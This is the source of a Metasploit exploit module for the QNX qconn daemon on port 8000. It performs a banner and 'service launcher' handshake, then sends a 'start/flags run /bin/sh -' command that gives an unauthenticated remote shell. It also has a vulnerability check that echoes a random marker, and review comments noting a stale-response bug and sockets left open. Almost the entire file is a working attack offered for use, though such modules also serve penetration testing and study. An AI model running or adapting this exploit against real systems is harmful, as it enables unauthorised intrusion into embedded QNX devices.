Path: blob/master/modules/exploits/qnx/qconn/qconn_exec.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for the QNX qconn daemon (RPORT 8000 by default). The
# daemon answers with a 'QCONN' banner, exposes a 'launcher' service that
# replies 'OK', and accepts 'start/flags run <command>' lines; #check and
# #exploit both drive that exchange over a single TCP socket.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  # Module metadata and datastore options.
  #
  # The default payload is cmd/unix/interact with ConnectionType 'find';
  # NOTE(review): that presumably means the session is attached to the
  # socket this module already holds when #exploit calls `handler` —
  # confirm against the framework's handler for 'find' payloads.
  #
  # @param info [Hash] module info merged by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'QNX qconn Command Execution',
        'Description' => %q{
          This module uses the qconn daemon on QNX systems to gain a shell.

          The QNX qconn daemon does not require authentication and allows
          remote users to execute arbitrary operating system commands.

          This module has been tested successfully on QNX Neutrino 6.5.0 (x86)
          and 6.5.0 SP1 (x86).
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'David Odell', # Discovery
          'Mor!p3r', # PoC
          'bcoles' # Metasploit
        ],
        'References' => [
          ['EDB', '21520'],
          ['URL', 'https://www.optiv.com/blog/pentesting-qnx-neutrino-rtos'],
          ['URL', 'http://www.qnx.com/developers/docs/6.5.0SP1/neutrino/utilities/q/qconn.html'],
          ['URL', 'http://www.qnx.com/developers/docs/6.5.0/topic/com.qnx.doc.neutrino_utilities/q/qconn.html']
        ],
        'Payload' => {
          'BadChars' => '',
          'DisableNops' => true,
          'Compat' => {
            'PayloadType' => 'cmd_interact',
            'ConnectionType' => 'find'
          }
        },
        'DefaultOptions' => {
          'WfsDelay' => 10,
          'PAYLOAD' => 'cmd/unix/interact'
        },
        'Platform' => 'unix', # QNX Neutrino
        'Arch' => ARCH_CMD,
        'Targets' => [['Automatic', {}]],
        'Privileged' => false,
        'DisclosureDate' => '2012-09-04',
        'DefaultTarget' => 0,
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => []
        }
      )
    )
    register_options(
      [
        Opt::RPORT(8000),
        # Shell started on the target by #exploit.
        OptString.new('SHELL', [true, 'Path to system shell', '/bin/sh'])
      ]
    )
  end

  # Vulnerability check: read the banner, select the launcher service and
  # run /bin/echo with a random marker; the host is reported Vulnerable
  # only when that marker is read back from the socket.
  #
  # @return [Msf::Exploit::CheckCode] Unknown when no banner is received,
  #   Safe when any reply in the exchange is not the expected one,
  #   Vulnerable when the echoed marker is seen.
  def check
    vprint_status('Sending check...')

    connect
    # Banner read; a falsy result (presumably a read timeout) is reported
    # as Unknown rather than Safe.
    res = sock.get_once(-1, 10)

    return CheckCode::Unknown('Connection failed') unless res

    return CheckCode::Safe unless res.include?('QCONN')

    # Select the launcher service; the daemon is expected to answer 'OK'.
    # .to_s guards the include? call against a nil read from here on.
    sock.put("service launcher\n")
    res = sock.get_once(-1, 10)

    return CheckCode::Safe unless res.to_s.include?('OK')

    # Random marker so the reply cannot be mistaken for other output.
    fingerprint = Rex::Text.rand_text_alphanumeric(5..10)
    sock.put("start/flags run /bin/echo /bin/echo #{fingerprint}\n")

    # NOTE(review): there is no read between the put above and this line,
    # so `res` still holds the 'service launcher' reply; this re-tests the
    # previous response rather than the start/flags one.
    return CheckCode::Safe unless res.to_s.include?('OK')

    # Give the echoed marker time to arrive before the single read below.
    Rex.sleep(1)

    res = sock.get_once(-1, 10)

    return CheckCode::Safe unless res.to_s.include?(fingerprint)

    # NOTE(review): disconnect runs only on this path; the Safe and Unknown
    # early returns above leave the socket open.
    disconnect

    CheckCode::Vulnerable
  end

  # Same banner / 'service launcher' handshake as #check, then starts the
  # configured SHELL with start/flags, waits for a prompt and hands the
  # socket to the payload handler. The socket is deliberately not closed
  # here.
  #
  # Aborts via fail_with: Unreachable when no banner is read,
  # UnexpectedReply when the banner lacks 'QCONN', when the launcher does
  # not answer 'OK', or when #negotiate_shell sees no prompt.
  def exploit
    connect
    res = sock.get_once(-1, 10)

    fail_with(Failure::Unreachable, 'Connection failed') unless res

    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.include?('QCONN')

    sock.put("service launcher\n")
    res = sock.get_once(-1, 10)

    fail_with(Failure::UnexpectedReply, 'Unexpected reply') unless res.to_s.include?('OK')

    print_status('Sending payload...')
    # The trailing '-' is passed as the shell's only argument.
    sock.put("start/flags run #{datastore['SHELL']} -\n")

    Rex.sleep(1)

    # negotiate_shell returns nil on an empty read or its own timeout.
    fail_with(Failure::UnexpectedReply, 'Shell negotiation failed. Unexpected reply.') unless negotiate_shell(sock)

    print_good('Payload sent successfully')

    # NOTE(review): with the 'find' ConnectionType declared in initialize
    # this presumably attaches the session to `sock` — confirm.
    handler
  end

  # Poll the socket for evidence that a shell has started.
  #
  # @param sock [Rex::Socket] the connected qconn socket
  # @return [true, nil] true once a read contains '#' or
  #   'No controlling tty'; nil when a read comes back blank or when the
  #   15 second overall timeout expires.
  def negotiate_shell(sock)
    Timeout.timeout(15) do
      loop do
        data = sock.get_once(-1, 10)

        # Blank (or nil) read: give up rather than keep polling.
        return if data.blank?

        if data.include?('#') || data.include?('No controlling tty')
          return true
        end

        # Short pause between polls while the shell produces output.
        Rex.sleep(0.5)
      end
    end
  rescue ::Timeout::Error
    # Overall deadline reached without a prompt; caller treats nil as failure.
    return nil
  end
end